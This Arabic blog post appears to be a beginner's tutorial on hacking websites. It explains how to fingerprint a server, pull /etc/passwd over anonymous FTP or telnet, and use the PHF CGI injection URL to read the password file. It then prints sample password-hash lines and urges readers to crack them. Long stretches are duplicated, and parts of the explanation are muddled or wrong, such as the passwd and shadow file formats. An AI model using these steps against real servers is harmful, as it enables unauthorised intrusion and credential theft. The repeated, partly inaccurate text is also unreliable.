البداية في إختراق المواقع
السلام عليكم و رحمة الله و بركاته اليوم نقدم لكم في مدونة هكرز المغرب العربي البداية في إختراق المواقع لأن أغلبكم لم يفهم درس الطريقة الصحيحة و المثلى في إختراق المواقع لذلك اليوم سنقدم لكم هذا الدرس لكي نتعلم جميعا ميكانيكية إختراق المواقع
حسنا نبدأ على بركة الله
أول شيء يجب علينا معرفة الملقمات أظن أن الجميع يعرفها لكن سأشرحها للمبتدئين
و هو من الملقمات التي تشتغل على ويندوز و هو ممتلئ بالثغرات : IIS
apache : وهو من الملقمات صعبة الإختراق إلا البعض من إصداراته و حتى إذا إستطاعت إختراقه أول شيء ستجد ملفين للباسوورد و كلمة السر تكون مضللة
حسنا إختراق المواقع هو شيء بسيط جدا يحتاج فقط إلى الذكاء ليس مثل إختراق الأجهزة الذي يعتمد على البرامج
حسنا نبدأ أول شيء سنتحدث على البيسك سيرفر و هو السيرفر الذي تعتمده أغلب المواقع العربية لكن المبتدئين يفكرون دائما بأن يخترقو المواقع المشهورة لكنهم لا يستطيعون بهذه الطريقة
حسنا لإختراق هذا النوع من السيرفرات عليك التعرف على نظام التشغيل له و يتم ذلك عبر عدة طرق مثل أن نقوم بإرسال رسالة خاطئة إلى الموقع مثلا لدينا موقع
www.kondor.com
نقوم بإرسال رسالة إلى الموقع ببريد عشوائي مثلا
hgcjhgkjuklvyjyk@kondor.com
ستصلك رسالة تقول لك إن هذا البريد غير موجود و هكذا نعرف ما هو نظام التشغيل و هناك أيضا طريقة أخرى من خلال موقع
www.netcraft.com
فيكفي منك أن تضع الموقع الذي تريد أن تخترقه في المربع الذي يوجد على اليمين و تقوم بالضغط على إبدأ سيقدم لك الموقع جميع المعلومات عنه
لكن نفترض أنك تريد إختراق سيرفر بسيط و غير آمن و هذا النوع موجود بكثرة في الإنترنت نعم بكثرة عندها سيكون إختراق هذا النوع و جلب الباسوورد أمر بسيط جدا و سهل و بعض أن تتعلم هذا لا تعد تقول إلى الشخص الذي يسألك أن الأمر معقد فكل هذا الكلام كذب
مثلا أدخل إلى السيرفر في وضع التخفي
(إستخدم التلنت في هذه الخطوة ) anonymously
و إبحث عن المجلد الذي إسمه
etc
و أطلب الملف
passwd
!!! هل رأيت إنها عملية بسيطة جدا لكن توقف
الذي أمامك الآن هو أسماء المستخدمين للسيرفر و كلماتهم السرية لكن كلمة السر ستكون مشفرة
هناك أيضا طريقة أخرى لإختراق هذه السيرفرات
إبحث في الموقع المستهدف من قبل المتصفح عن يا ترى يوجد سي جي أي
عند التوفر أطلب الملف التالي
cgi-bin/phf?Qalias=x
/bin/cat /etc/passwd
مثلا عنوان الموقع هكذا
www.kondor.com
نكتب هكذا
www.kondor.com/cgi-bin/phf?Qalias=x/bin/cat/etc/passwd
عندها سيقوم بإرسال لك ملف
باسود
و هذا الملف يحتوي على كل أسماء المستخدمين المرخص لهم بالدخول إلى السيرفر و كلمات السر لكنها ستكون مشفرة
حسنا المهم عند الحصول على ملف باسود سيكون كالتالي
Sources Code - شفرة
root:x:0:1:0000-Admin(0000):/:/bin/ksh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
listen:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
nobody:/:noaccess:x:60002:60002:uid noaccess:/:
ftp:x:101:4:
FTPUser:/export/home/ftp:
kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor
حسنا نحن الآن نحتاج فقط إلى هذا السطر
kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor
kondor و عند تفسيره يقول لنا إن اسم المستخدم هو
yu&rte6745kd و كلمة السر
و أيضا
User number: 201
Group Number: 4
Real Name (usually): Richard Clark
Home Directory: /export/home/rrc
Type of Shell: /bin/ksh
الآن فهمنا ماذ يعني السطر هذا السطر من الملف passwd
kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor
حاولت أن تعرف من هذه شئ
admin sign in:/:/bin/csh
sysadm:ufcNtKNYj7m9I:0:0:
Regular Admin login:/admin:/sbin/sh
bin:*:2:2:Admin :/bin:
sys:*:3:3:Admin :/usr/src:
adm:*:4:4:Admin :/usr/adm:/sbin/sh
daemon:*:1:1: Daemon Login for daemons needing
nobody:*:65534:65534::/:
ftp:*:39:39:FTP guest login:/var/ftp:
dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh
joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh
حسنا نبدأ على بركة الله
أول شيء يجب علينا معرفة الملقمات أظن أن الجميع يعرفها لكن سأشرحها للمبتدئين
و هو من الملقمات التي تشتغل على ويندوز و هو ممتلئ بالثغرات : IIS
apache : وهو من الملقمات صعبة الإختراق إلا البعض من إصداراته و حتى إذا إستطاعت إختراقه أول شيء ستجد ملفين للباسوورد و كلمة السر تكون مضللة
حسنا إختراق المواقع هو شيء بسيط جدا يحتاج فقط إلى الذكاء ليس مثل إختراق الأجهزة الذي يعتمد على البرامج
حسنا نبدأ أول شيء سنتحدث على البيسك سيرفر و هو السيرفر الذي تعتمده أغلب المواقع العربية لكن المبتدئين يفكرون دائما بأن يخترقو المواقع المشهورة لكنهم لا يستطيعون بهذه الطريقة
حسنا لإختراق هذا النوع من السيرفرات عليك التعرف على نظام التشغيل له و يتم ذلك عبر عدة طرق مثل أن نقوم بإرسال رسالة خاطئة إلى الموقع مثلا لدينا موقع
www.kondor.com
نقوم بإرسال رسالة إلى الموقع ببريد عشوائي مثلا
hgcjhgkjuklvyjyk@kondor.com
ستصلك رسالة تقول لك إن هذا البريد غير موجود و هكذا نعرف ما هو نظام التشغيل و هناك أيضا طريقة أخرى من خلال موقع
www.netcraft.com
فيكفي منك أن تضع الموقع الذي تريد أن تخترقه في المربع الذي يوجد على اليمين و تقوم بالضغط على إبدأ سيقدم لك الموقع جميع المعلومات عنه
لكن نفترض أنك تريد إختراق سيرفر بسيط و غير آمن و هذا النوع موجود بكثرة في الإنترنت نعم بكثرة عندها سيكون إختراق هذا النوع و جلب الباسوورد أمر بسيط جدا و سهل و بعض أن تتعلم هذا لا تعد تقول إلى الشخص الذي يسألك أن الأمر معقد فكل هذا الكلام كذب
مثلا أدخل إلى السيرفر في وضع التخفي
(إستخدم التلنت في هذه الخطوة ) anonymously
و إبحث عن المجلد الذي إسمه
etc
و أطلب الملف
passwd
!!! هل رأيت إنها عملية بسيطة جدا لكن توقف
الذي أمامك الآن هو أسماء المستخدمين للسيرفر و كلماتهم السرية لكن كلمة السر ستكون مشفرة
هناك أيضا طريقة أخرى لإختراق هذه السيرفرات
إبحث في الموقع المستهدف من قبل المتصفح عن يا ترى يوجد سي جي أي
عند التوفر أطلب الملف التالي
cgi-bin/phf?Qalias=x
/bin/cat /etc/passwd
مثلا عنوان الموقع هكذا
www.kondor.com
نكتب هكذا
www.kondor.com/cgi-bin/phf?Qalias=x/bin/cat/etc/passwd
عندها سيقوم بإرسال لك ملف
باسود
و هذا الملف يحتوي على كل أسماء المستخدمين المرخص لهم بالدخول إلى السيرفر و كلمات السر لكنها ستكون مشفرة
حسنا المهم عند الحصول على ملف باسود سيكون كالتالي
Sources Code - شفرة
root:x:0:1:0000-Admin(0000):/:/bin/ksh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
listen:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
nobody:/:noaccess:x:60002:60002:uid noaccess:/:
ftp:x:101:4:
FTPUser:/export/home/ftp:
kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor
حسنا نحن الآن نحتاج فقط إلى هذا السطر
kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor
kondor و عند تفسيره يقول لنا إن اسم المستخدم هو
yu&rte6745kd و كلمة السر
و أيضا
User number: 201
Group Number: 4
Real Name (usually): Richard Clark
Home Directory: /export/home/rrc
Type of Shell: /bin/ksh
الآن فهمنا ماذ يعني السطر هذا السطر من الملف passwd
kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor
حاولت أن تعرف من هذه شئ
admin sign in:/:/bin/csh
sysadm:ufcNtKNYj7m9I:0:0:
Regular Admin login:/admin:/sbin/sh
bin:*:2:2:Admin :/bin:
sys:*:3:3:Admin :/usr/src:
adm:*:4:4:Admin :/usr/adm:/sbin/sh
daemon:*:1:1: Daemon Login for daemons needing
nobody:*:65534:65534::/:
ftp:*:39:39:FTP guest login:/var/ftp:
dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh
joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh
هنالك البعض سيسأل هل كل الثغرات تنجح
طبعا لا لا بد أن تكون عارف لأي شيء هذه الثغرة و على أي نظام تستخدم و هل يجب أن يكون مع برنامج التشغيل برنامج آخر ليتم الدخول إلى السيرفر و كل هذه المعلومات يجب أن تتوفر
حسنا نبدأ الآن لكن بعمق
عرفنا الآن أن
passwd file (سنسميه من الآن ملف الباسوورد )
يحتوي على أسماء المستخدمين المرخص لهم بالدخول إلى السيرفر و كلمات السر و عرفنا أيضا أنها مشفرة لكن الآن ضع تركيزك الكامل في الحصول على اسم المستخدم و كلمة السر و لا تضع إهتمامك في كسر تشفير كلمة السر لأنها في الأخير سهلة
حسنا الآن ننتقل إلى الثغرات
أول شيء سأشرحها أنا أعرف أن الأغلبية يعرفها لكن سأشرحها للمبتدئين
الثغرات هي حفر وهفوات في السفت وير فقط وتمكن أي شخص من الحصول على معلمومات أو نشر فيروسات من خلال هذه الثغره
من ضمن هذه الثغرات ثغره سبق وذكرتها لكم في هذا المقال وهي في ملفات السي جي آي واستخدمناها لإختراق الموقع
www.kondor.com
حسنا الآن سنقدم تفاصيل عنها
PHF تسمى هذه الثغرة الأمنية ب
(و معظم السيرفرات تمتلك هذه الثغرة و للأسف إلى الآن لم يتم رقعها (إذا وجد عنده السي جي أي فقط
إذا نجحت هذه الثغرة سيتم عرض لك ملف الباسوورد مثل هذا
Sources Code - شفرة
root:x:0:1:0000-Admin(0000):/:/bin/ksh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
listen:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
nobody:/:noaccess:x:60002:60002:uid noaccess:/:
ftp:x:101:4:
FTPUser:/export/home/ftp:
kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor
كما ذكرنا سابقا إحفظ الملف في تكست لكي نسوي له عملية لكسر التشفير
FTP passwd
بعض السيرفرات تحفظ ملف الباسورد في الإف تي بي نفسه ، أي تستطيع الى حد بعيد أن تحصل على ملف الباسورد من خلال دخولك في وصع مخفي
anonymous logins
والدخول بالوضع الخفي شئ قانوني ، وتسحب ملف الباسورد من الهدف المحدد و قم بإستخدام أحد هذه البرامج لعمل ذلك
WS FTP or CuteFTP
و بعد أن تدخل إلى الوضع الخفي ستظهر لك قائمة
إختر منها
etc
وراح يعرض لك عدد قليل من الملفات مثل هذا
"group, passwd"
وملف الباسورد مو شرط يكون إسمه
passwd
ممكن يكون غير كذا .. المهم أنت أسحبه وإفتحه ولو شفت إسم مثل
"root, daemon, FTP, nobody, ftplogin, bin"
وإذا لقيت بالقرب من هذه الكلمات رمز نجمه كهذه * وقد رمز آخر مثل علامه إكس فقط ، لن ينفعك الإستعانه بأحد الكراكر ولكن كل ماعليك أن تتعقب الباسورد ويجب ان تبحث لحل لهذه المشكله فأنا حتى تحصل على مثل هذا
"joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh"
والآن إستعن بأحد الكراكر لكسر كلمة السر او حاول عن طريق البرامج الذي ذكرتها لك سابقن
س : ماهو إسم المستخد هنا وماهي كلمة السر المشفره ؟
جاوب أنت .... !:!
التعقب لملف الباسورد
الآن وبعد أن حصلت على مثل هذا
"joetest:*:102:100::/home/joetest:/usr/bin/restsh"
فأنت الآن تملك
shadowed passwd
فهذا يتدلى في نظام التشفيل ولكن الـ
passwd file
يختلف (لا داعي لتعمق اكثر ) والملف
passwd file
x هو الذي نجد كلمة السر فيه مشفره وليست رمز واحد مثل * أو
و الـ
shadow file
يكون مكان كلمة السر نجمه أو رمز
وأنا الى الآن لست متأكد من هذه النقطه
انا الحين تعبت من الكتابه ،، اتمنى أنكم طلعتو بفايده
FTP passwd
بعض السيرفرات تحفظ ملف الباسورد في الإف تي بي نفسه ، أي تستطيع الى حد بعيد أن تحصل على ملف الباسورد من خلال دخولك في وصع مخفي
anonymous logins
والدخول بالوضع الخفي شئ قانوني ، وتسحب ملف الباسورد من الهدف المحدد و قم بإستخدام أحد هذه البرامج لعمل ذلك
WS FTP or CuteFTP
و بعد أن تدخل إلى الوضع الخفي ستظهر لك قائمة
إختر منها
etc
وراح يعرض لك عدد قليل من الملفات مثل هذا
"group, passwd"
وملف الباسورد مو شرط يكون إسمه
passwd
ممكن يكون غير كذا .. المهم أنت أسحبه وإفتحه ولو شفت إسم مثل
"root, daemon, FTP, nobody, ftplogin, bin"
وإذا لقيت بالقرب من هذه الكلمات رمز نجمه كهذه * وقد رمز آخر مثل علامه إكس فقط ، لن ينفعك الإستعانه بأحد الكراكر ولكن كل ماعليك أن تتعقب الباسورد ويجب ان تبحث لحل لهذه المشكله فأنا حتى تحصل على مثل هذا
"joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh"
والآن إستعن بأحد الكراكر لكسر كلمة السر او حاول عن طريق البرامج الذي ذكرتها لك سابقن
س : ماهو إسم المستخد هنا وماهي كلمة السر المشفره ؟
جاوب أنت .... !:!
التعقب لملف الباسورد
الآن وبعد أن حصلت على مثل هذا
"joetest:*:102:100::/home/joetest:/usr/bin/restsh"
فأنت الآن تملك
shadowed passwd
فهذا يتدلى في نظام التشفيل ولكن الـ
passwd file
يختلف (لا داعي لتعمق اكثر ) والملف
passwd file
x هو الذي نجد كلمة السر فيه مشفره وليست رمز واحد مثل * أو
و الـ
shadow file
يكون مكان كلمة السر نجمه أو رمز
وأنا الى الآن لست متأكد من هذه النقطه
انا الحين تعبت من الكتابه ،، اتمنى أنكم طلعتو بفايده
Commentaires
Enregistrer un commentaire